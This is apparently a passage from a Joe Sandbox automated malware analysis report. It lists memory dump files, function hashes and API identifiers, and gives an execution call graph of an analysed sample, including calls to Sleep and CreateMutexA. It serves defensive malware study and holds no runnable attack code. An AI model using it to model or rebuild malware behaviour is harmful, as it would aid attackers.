                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                                          • Instruction ID: 2370da0177e6d79f8af496d00628a38997a6e5d9d5b7f2aeb34aa1a8d9af8d0a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F115E7F22314B47E604AE2DC8B46B7A395EBC53217EC4375C0418BBC4DA22E4719700
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                                                                          • Instruction ID: 15fb46affe32bfff3819b08f8213a255f875d08d84e3710ea452087169efd00e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38E08C32922268EBCB15EF98C90498EF3ECEB89B10B658096F905D3191C270DE00CBD0
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 32384418-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 3406e226b6419289ee19be85dc805a639ffef8e250f317de36ae8167642baccb
                                                                                                                                                                                                                                                                                          • Instruction ID: d6096af36d217c095f84a2901326259228029dfc05fa569c002e4d17fe1e099b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3406e226b6419289ee19be85dc805a639ffef8e250f317de36ae8167642baccb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44A1D170A21306DFDB29EF65C84576AB7B8FF15311F144229E819D7281FB31EA28CB91
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 531285432-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 6e924dcf9752980fd1dbecbde07537fc4a0fcc969c19cc7061247d5e86f59009
                                                                                                                                                                                                                                                                                          • Instruction ID: bc5510174a61a4d64686cbb32f63f732afc7a411bc24f4923fb6c9fe0ab5bd43
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e924dcf9752980fd1dbecbde07537fc4a0fcc969c19cc7061247d5e86f59009
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA215C71E10219AFDF00EFA4DC859BEB7B9EF48711F100016F901A7250DB709D158BA4

                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                          Execution Coverage:0.9%
                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                                          Total number of Nodes:614
                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                                                                                                                          execution_graph 10429 fe8bbe 10430 fe8868 3 API calls 10429->10430 10431 fe8bdc 10430->10431 10301 fbcc79 10303 fbcc84 shared_ptr 10301->10303 10302 fbccda shared_ptr __floor_pentium4 10303->10302 10304 fb5c10 3 API calls 10303->10304 10305 fbce9d 10304->10305 10307 fbca70 10305->10307 10308 fbcadd 10307->10308 10309 fb5c10 3 API calls 10308->10309 10316 fbcc87 10308->10316 10311 fbccf9 10309->10311 10310 fbccda shared_ptr __floor_pentium4 10317 fb9030 10311->10317 10313 fb5c10 3 API calls 10314 fbce9d 10313->10314 10315 fbca70 3 API calls 10314->10315 10316->10310 10316->10313 10318 fb9080 10317->10318 10319 fb5c10 3 API calls 10318->10319 10320 fb909a shared_ptr __floor_pentium4 10319->10320 10320->10316 10157 fb9ab8 10159 fb9acc 10157->10159 10160 fb9b08 10159->10160 10161 fba917 10160->10161 10163 fb9b4b shared_ptr 10160->10163 10162 fba953 Sleep CreateMutexA 10161->10162 10167 fba98e 10162->10167 10164 fb9b59 10163->10164 10165 fb5c10 3 API calls 10163->10165 10166 fb9b7c 10165->10166 10168 fb8b30 3 API calls 10166->10168 10169 fb9b8d 10168->10169 10170 fb5c10 3 API calls 10169->10170 10171 fb9cb1 10170->10171 10172 fb8b30 3 API calls 10171->10172 10173 fb9cc2 10172->10173 10174 fb42b0 10177 fb3ac0 10174->10177 10176 fb42bb shared_ptr 10178 fb3af9 10177->10178 10179 fb3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10178->10179 10182 fb3c38 10178->10182 10187 fb32d0 10178->10187 10179->10176 10181 fb32d0 5 API calls 10184 fb3c5f 10181->10184 10182->10181 10182->10184 10183 fb3c68 10183->10176 10184->10183 10206 fb3810 10184->10206 10188 fcc6ac GetSystemTimePreciseAsFileTime 10187->10188 10195 fb3314 10188->10195 10189 fb336b 10190 fcc26a 4 API calls 10189->10190 10191 fb333c __Mtx_unlock 10190->10191 10193 fcc26a 4 API calls 10191->10193 10196 fb3350 __floor_pentium4 10191->10196 10192 fcbd4c GetSystemTimePreciseAsFileTime 10192->10195 10194 fb3377 10193->10194 10197 fcc6ac GetSystemTimePreciseAsFileTime 10194->10197 10195->10189 10195->10191 10195->10192 10196->10182 10198 fb33af 10197->10198 10199 fcc26a 4 API calls 10198->10199 10200 fb33b6 __Cnd_broadcast 10198->10200 10199->10200 10201 fcc26a 4 API calls 10200->10201 10202 fb33d7 __Mtx_unlock 10200->10202 10201->10202 10203 fcc26a 4 API calls 10202->10203 10204 fb33eb 10202->10204 10205 fb340e 10203->10205 10204->10182 10205->10182 10207 fb381c 10206->10207 10210 fb2440 10207->10210 10213 fcb5d6 10210->10213 10212 fb2472 10214 fcb5f1 std::_Throw_future_error 10213->10214 10215 fe8bec __cftof 3 API calls 10214->10215 10217 fcb658 __cftof __floor_pentium4 10214->10217 10216 fcb69f 10215->10216 10217->10212 10348 fb55f0 10349 fb5610 10348->10349 10350 fb22c0 3 API calls 10349->10350 10351 fb5710 __floor_pentium4 10349->10351 10350->10349 10352 fb43f0 10353 fcbedf InitOnceExecuteOnce 10352->10353 10354 fb440a 10353->10354 10355 fb4411 10354->10355 10356 fe6cbb 3 API calls 10354->10356 10357 fb4424 10356->10357 10455 fb2170 10458 fcc6fc 10455->10458 10457 fb217a 10459 fcc70c 10458->10459 10460 fcc724 10458->10460 10459->10460 10462 fccfbe 